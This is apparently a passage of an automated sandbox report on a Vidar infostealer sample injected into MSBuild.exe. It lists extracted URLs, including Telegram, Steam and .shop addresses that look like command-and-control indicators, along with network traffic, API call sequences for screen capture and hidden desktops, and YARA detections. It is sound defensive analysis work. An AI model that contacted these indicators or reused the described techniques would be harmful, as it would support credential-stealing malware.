Source: x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003A35000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1426071903.0000000002971000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1443465612.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003A35000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1443465612.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: x9Lh8czsmo.exe, 00000000.00000002.1426071903.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1426071903.0000000002971000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B84000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000002.00000002.1986442365.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199819539662
Source: MSBuild.exe, 00000002.00000002.1986442365.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199819539662go2dnizMozilla/5.0
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sts.windows-ppe.net/
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sts.windows.net/
Source: MSBuild.exe, 00000002.00000002.1996007591.0000000003F59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: MSBuild.exe, 00000002.00000002.1996007591.0000000003F59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B65000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1986442365.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/sc1phell
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/sc1phellS
Source: MSBuild.exe, 00000002.00000002.1986442365.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/sc1phellgo2dnizMozilla/5.0
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tlfiyat.shop
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tlfiyat.shop/
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tlfiyat.shopNz
Source: msedge.exe, 00000009.00000003.1740066082.00000160669F7000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1764566011.000001606D43D000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1741148190.000001606D402000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
Source: msedge.exe, 00000009.00000003.1740066082.00000160669F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/https://unitedstates4.ss.wd.microsoft.us/https://unitedstat
Source: msedge.exe, 00000009.00000003.1740066082.00000160669F7000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1764566011.000001606D43D000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1741148190.000001606D402000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
Source: msedge.exe, 00000009.00000003.1740066082.00000160669F7000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1764566011.000001606D43D000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1741148190.000001606D402000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
Source: msedge.exe, 00000009.00000003.1785247106.00007BAC03294000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://web.sogou.com/?
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org
Source: chromecache_168.7.dr String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: MSBuild.exe, 00000002.00000002.1994278216.0000000003C39000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1994278216.0000000003D1E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1987744561.0000000000BED000.00000004.00000020.00020000.00000000.sdmp, gvk6ph.2.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.catcert.net/verarrel
Source: msedge.exe, 00000009.00000003.1782892772.00007BAC02D5C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.catcert.net/verarrel05
Source: msedge.exe, 00000009.00000003.1754605445.00007BAC00764000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.clarity.ms
Source: MSBuild.exe, 00000002.00000002.1991362026.0000000003948000.00000004.00000020.00020000.00000000.sdmp, u3ecje.2.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000005.00000003.1630860312.00001238024A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 00000005.00000003.1630860312.00001238024A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 00000005.00000003.1630860312.00001238024A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000005.00000003.1618311202.0000123802EA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
Source: MSBuild.exe, 00000002.00000002.1991362026.0000000003948000.00000004.00000020.00020000.00000000.sdmp, u3ecje.2.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000005.00000003.1635168932.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636629079.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1634640330.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636686729.00001238035B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636744125.0000123803694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635448145.0000123803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635361646.0000123803660000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
Source: chrome.exe, 00000005.00000003.1635361646.0000123803660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635792851.000012380361C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000005.00000003.1618772647.0000123802514000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000005.00000003.1630860312.00001238024A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/aida2
Source: chromecache_168.7.dr String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_168.7.dr String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chrome.exe, 00000005.00000003.1646589793.0000123803B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1646218672.0000123803B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 00000005.00000003.1630860312.00001238024A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 00000005.00000003.1630860312.00001238024A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: chromecache_165.7.dr String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_165.7.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_165.7.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: chrome.exe, 00000005.00000003.1636744125.0000123803694000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000005.00000003.1636594106.00001238030BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635168932.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636629079.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1634640330.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636686729.00001238035B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636744125.0000123803694000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000005.00000003.1636686729.00001238035B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636744125.0000123803694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635448145.0000123803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635361646.0000123803660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635792851.000012380361C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.49JL8PttH04.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 00000005.00000003.1636686729.00001238035B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636744125.0000123803694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635448145.0000123803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635361646.0000123803660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635792851.000012380361C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.avVfaMsGWq0.L.W.O/m=qmd
Source: MSBuild.exe, 00000002.00000002.1994278216.0000000003C39000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1994278216.0000000003D1E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1987744561.0000000000BED000.00000004.00000020.00020000.00000000.sdmp, gvk6ph.2.dr String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: msedge.exe, 00000009.00000003.1785247106.00007BAC03294000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ludashi.com/cms/server/monitor.php?id=
Source: msedge.exe, 00000009.00000003.1754605445.00007BAC00764000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.microsoftstart.com
Source: MSBuild.exe, 00000002.00000002.1996007591.0000000003F59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: MSBuild.exe, 00000002.00000002.1996007591.0000000003F59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: MSBuild.exe, 00000002.00000002.1996007591.0000000003F59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: MSBuild.exe, 00000002.00000002.1996007591.0000000003F59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: msedge.exe, 00000009.00000003.1754605445.00007BAC00764000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.cn
Source: msedge.exe, 00000009.00000003.1754605445.00007BAC00764000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: msedge.exe, 00000009.00000003.1738803679.00007BAC0093C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1737860185.00007BAC0093C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1737491733.00007BAC0093C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: msedge.exe, 00000009.00000003.1738803679.00007BAC0093C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1737860185.00007BAC0093C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1737491733.00007BAC0093C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/Char
Source: msedge.exe, 00000009.00000003.1751788782.00007BAC00B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/Office=?
Source: msedge.exe, 00000009.00000003.1751788782.00007BAC00B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.tiktok.com/
Source: msedge.exe, 00000009.00000003.1751788782.00007BAC00B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.99.120.106:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040EAB5 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 2_2_0040EAB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00405AD3 memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,CreateProcessA,Sleep,CloseDesktop, 2_2_00405AD3

System Summary

barindex
Source: 2.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 0.2.x9Lh8czsmo.exe.3b52430.2.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 00000002.00000002.1986442365.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05ED9540 NtResumeThread, 0_2_05ED9540
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05ED5768 NtProtectVirtualMemory, 0_2_05ED5768
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05ED953B NtResumeThread, 0_2_05ED953B
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05ED5760 NtProtectVirtualMemory, 0_2_05ED5760
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_00F2E928 0_2_00F2E928
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_00F2A5C8 0_2_00F2A5C8
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_00F2AF50 0_2_00F2AF50
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_00F21C50 0_2_00F21C50
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05C90040 0_2_05C90040
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05C90006 0_2_05C90006
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB6FE8 0_2_05CB6FE8
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CBB200 0_2_05CBB200
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB6DAA 0_2_05CB6DAA
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB6DB8 0_2_05CB6DB8
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB6FDA 0_2_05CB6FDA
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB8FE0 0_2_05CB8FE0
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB8FF0 0_2_05CB8FF0
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB26C5 0_2_05CB26C5
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CBB1F2 0_2_05CBB1F2
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB0040 0_2_05CB0040
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB0023 0_2_05CB0023
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB7B28 0_2_05CB7B28
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CB7B38 0_2_05CB7B38
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CCDD90 0_2_05CCDD90
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CCA543 0_2_05CCA543
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CCA116 0_2_05CCA116
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CC7BD8 0_2_05CC7BD8
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CCAB98 0_2_05CCAB98
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CC2374 0_2_05CC2374
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CCEF98 0_2_05CCEF98
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CCE0B7 0_2_05CCE0B7
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CC7BC8 0_2_05CC7BC8
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05CCAB88 0_2_05CCAB88
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05D2A300 0_2_05D2A300
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05D227F0 0_2_05D227F0
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05D227E0 0_2_05D227E0
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05D2A2F0 0_2_05D2A2F0
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05D507C8 0_2_05D507C8
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05D5D330 0_2_05D5D330
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05ED2170 0_2_05ED2170
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05ED1500 0_2_05ED1500
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05ED1510 0_2_05ED1510
